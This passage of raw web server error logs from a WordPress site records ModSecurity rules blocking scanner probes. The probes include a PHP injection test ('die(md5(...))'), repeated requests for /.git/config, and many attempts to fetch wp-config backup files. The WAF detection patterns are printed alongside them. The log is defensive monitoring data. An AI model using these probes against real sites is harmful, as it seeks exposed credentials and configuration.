"CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/versions.php"] [unique_id "ZT-q0G-joOS3xgtAFHQOvQAAAFc"], referer: investigacionperu.com [Mon Oct 30 10:33:24.730670 2023] [:error] [pid 17154:tid 140525046834944] [client 198.55.57.24:50728] [client 198.55.57.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:ss. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:ss: die(md5(4565462));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-load.php"] [unique_id "ZT_MxCYxxMFZ5mvStQm2GgAAAIo"], referer: investigacionperu.com [Mon Oct 30 14:59:38.493274 2023] [autoindex:error] [pid 19291:tid 140018525914880] [client 103.15.216.133:55970] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php 2023/10/30 15:06:28 [error] 18895#18895: *1883 access forbidden by rule, client: 3.238.97.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Oct 31 21:32:40.410177 2023] [:error] [pid 19369:tid 139998342866688] [client 178.20.55.182:40606] [client 178.20.55.182] ModSecurity: Access denied with code 403 (phase 2). Pattern match ".+application/x-shockwave-flash|image/svg\\\\+xml|text/(css|html|ecmascript|javascript|vbscript|x-(javascript|scriptlet|vbscript)).+" at ARGS:wp_submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "309"] [id "973302"] [rev "2"] [msg "XSS Attack Detected"] [data "Matched Data: text/html; charset=utf-8 found within ARGS:wp_submit: tp-equiv=\\x22content-type\\x22 content=\\x22text/html; charset=utf-8"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-login.php"] [unique_id "ZUG4yNV6W_33u9_JfndQJQAAARg"] [Tue Oct 31 22:06:32.691478 2023] [autoindex:error] [pid 13605:tid 139998359652096] [client 192.138.189.182:41196] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php 2023/11/02 00:42:32 [error] 3540#3540: *43189 access forbidden by rule, client: 137.184.106.30, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/11/02 00:42:32 [error] 3539#3539: *43233 access forbidden by rule, client: 137.184.150.232, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/11/02 00:42:32 [error] 3540#3540: *43267 access forbidden by rule, client: 178.128.151.41, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/11/02 00:42:32 [error] 3540#3540: *43305 access forbidden by rule, client: 159.89.83.196, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/11/02 00:42:34 [error] 3540#3540: *43374 access forbidden by rule, client: 161.35.155.246, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/11/02 00:42:37 [error] 3540#3540: *43432 access forbidden by rule, client: 46.101.103.192, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Nov 02 01:58:53.715076 2023] [:error] [pid 8540:tid 139890373162752] [client 45.147.250.75:44958] [client 45.147.250.75] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".xsd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vendor/phpunit/phpunit/phpunit.xsd"] [unique_id "ZUNIrXaW1-rLMPPKMUGvFAAAAQc"] [Thu Nov 02 03:07:18.529495 2023] [ssl:warn] [pid 16256:tid 140109293397888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:22.713854 2023] [ssl:warn] [pid 16257:tid 140109293397888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:23.265802 2023] [ssl:warn] [pid 16257:tid 140109293397888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:24.881765 2023] [ssl:warn] [pid 16257:tid 140109293397888] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:27.471692 2023] [ssl:warn] [pid 16702:tid 139744245135232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:35.651595 2023] [ssl:warn] [pid 16703:tid 139744245135232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 03:07:36.318189 2023] [ssl:warn] [pid 16703:tid 139744245135232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 11:31:17.162840 2023] [:error] [pid 16855:tid 139743908050688] [client 116.87.140.36:34146] [client 116.87.140.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config-sample.bak"] [unique_id "ZUPO0kdRTtgFCYu_9LOu8wAAAIo"] [Thu Nov 02 13:18:26.444238 2023] [:error] [pid 18996:tid 139743908050688] (12)Cannot allocate memory: [client 194.233.87.73:45498] couldn't create child process: /usr/local/sbin/suphp for /home/investig/public_html/index.php [Thu Nov 02 13:51:53.062318 2023] [ssl:warn] [pid 1016:tid 139755561691008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 13:52:01.420321 2023] [ssl:warn] [pid 1908:tid 139755561691008] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 13:58:44.060019 2023] [ssl:warn] [pid 1014:tid 139635079632768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 13:58:48.426683 2023] [ssl:warn] [pid 1678:tid 139635079632768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 14:02:09.744562 2023] [ssl:warn] [pid 1678:tid 139635079632768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 02 15:49:26.855827 2023] [:error] [pid 3436:tid 139634637969152] [client 222.153.229.79:52642] [client 222.153.229.79] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "ZUQLVk0czDrRyUfZPEinGwAAANY"] [Thu Nov 02 16:13:35.029684 2023] [:error] [pid 3436:tid 139634814215936] [client 88.149.253.249:53638] [client 88.149.253.249] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZUQQ_00czDrRyUfZPEinwQAAAME"] [Thu Nov 02 17:30:53.151749 2023] [:error] [pid 3291:tid 139634789037824] [client 59.154.103.30:55212] [client 59.154.103.30] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "ZUQjHTDVEO-5tYJPC_2dWQAAAIQ"] [Thu Nov 02 17:43:39.590503 2023] [:error] [pid 3291:tid 139634629576448] [client 77.239.130.186:55354] [client 77.239.130.186] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.com"] [unique_id "ZUQmGzDVEO-5tYJPC_2dZQAAAJc"] [Thu Nov 02 17:57:13.483282 2023] [:error] [pid 3291:tid 139634822608640] [client 95.255.2.247:55466] [client 95.255.2.247] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "ZUQpSTDVEO-5tYJPC_2daAAAAIA"] [Thu Nov 02 18:10:10.809032 2023] [:error] [pid 3291:tid 139634705110784] [client 85.226.33.214:55600] [client 85.226.33.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cs"] [unique_id "ZUQsUjDVEO-5tYJPC_2dbAAAAI4"] [Thu Nov 02 18:25:20.232684 2023] [:error] [pid 3436:tid 139634629576448] [client 213.123.122.177:55900] [client 213.123.122.177] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".csproj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.csproj"] [unique_id "ZUQv4E0czDrRyUfZPEio4wAAANc"] [Thu Nov 02 21:33:36.911634 2023] [:error] [pid 20022:tid 139634713503488] [client 5.128.91.71:59128] [client 5.128.91.71] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZURcAH-uQR4hpwrqENFgzQAAAU0"] [Thu Nov 02 21:44:28.191152 2023] [:error] [pid 3291:tid 139634679932672] [client 82.115.122.225:59230] [client 82.115.122.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.ini"] [unique_id "ZURejDDVEO-5tYJPC_2eTQAAAJE"] [Thu Nov 02 22:38:19.994712 2023] [:error] [pid 3436:tid 139634679932672] [client 2.121.12.158:60066] [client 2.121.12.158] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.log"] [unique_id "ZURrK00czDrRyUfZPEiqjAAAANE"] [Thu Nov 02 23:46:47.175996 2023] [:error] [pid 3436:tid 139634789037824] [client 27.74.249.165:33386] [client 27.74.249.165] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZUR7N00czDrRyUfZPEirJgAAAMQ"] [Fri Nov 03 03:10:27.039775 2023] [ssl:warn] [pid 1164:tid 139940599961472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 03 03:10:39.238407 2023] [ssl:warn] [pid 1170:tid 139940599961472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 03 03:10:39.743469 2023] [ssl:warn] [pid 1170:tid 139940599961472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 03 03:10:41.517588 2023] [ssl:warn] [pid 1170:tid 139940599961472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 03 03:10:43.773395 2023] [ssl:warn] [pid 1893:tid 140040513578880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 03 03:10:51.954669 2023] [ssl:warn] [pid 1899:tid 140040513578880] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/11/03 06:20:57 [error] 1744#1744: *11241 access forbidden by rule, client: 92.63.197.153, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Nov 03 11:41:55.847558 2023] [autoindex:error] [pid 1917:tid 140040185292544] [client 5.196.77.223:46468] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Sat Nov 04 03:49:17.256724 2023] [ssl:warn] [pid 31809:tid 140561907083136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 03:49:21.437105 2023] [ssl:warn] [pid 31811:tid 140561907083136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 03:49:21.948195 2023] [ssl:warn] [pid 31811:tid 140561907083136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 03:49:23.512249 2023] [ssl:warn] [pid 31811:tid 140561907083136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 03:49:25.769120 2023] [ssl:warn] [pid 32238:tid 140299744823168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 03:49:33.954830 2023] [ssl:warn] [pid 32242:tid 140299744823168] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 04 16:54:05.469764 2023] [:error] [pid 32259:tid 140299460404992] [client 162.218.242.246:53582] [client 162.218.242.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".vb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.vb"] [unique_id "ZUa9ffDp5LgkYcYLjZxFAQAAAAQ"] [Sat Nov 04 17:09:24.760514 2023] [:error] [pid 364:tid 140299418441472] [client 162.218.242.246:53800] [client 162.218.242.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".vbproj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.vbproj"] [unique_id "ZUbBFPBQGoo7YbJiQ-XbmAAAAMk"] [Sun 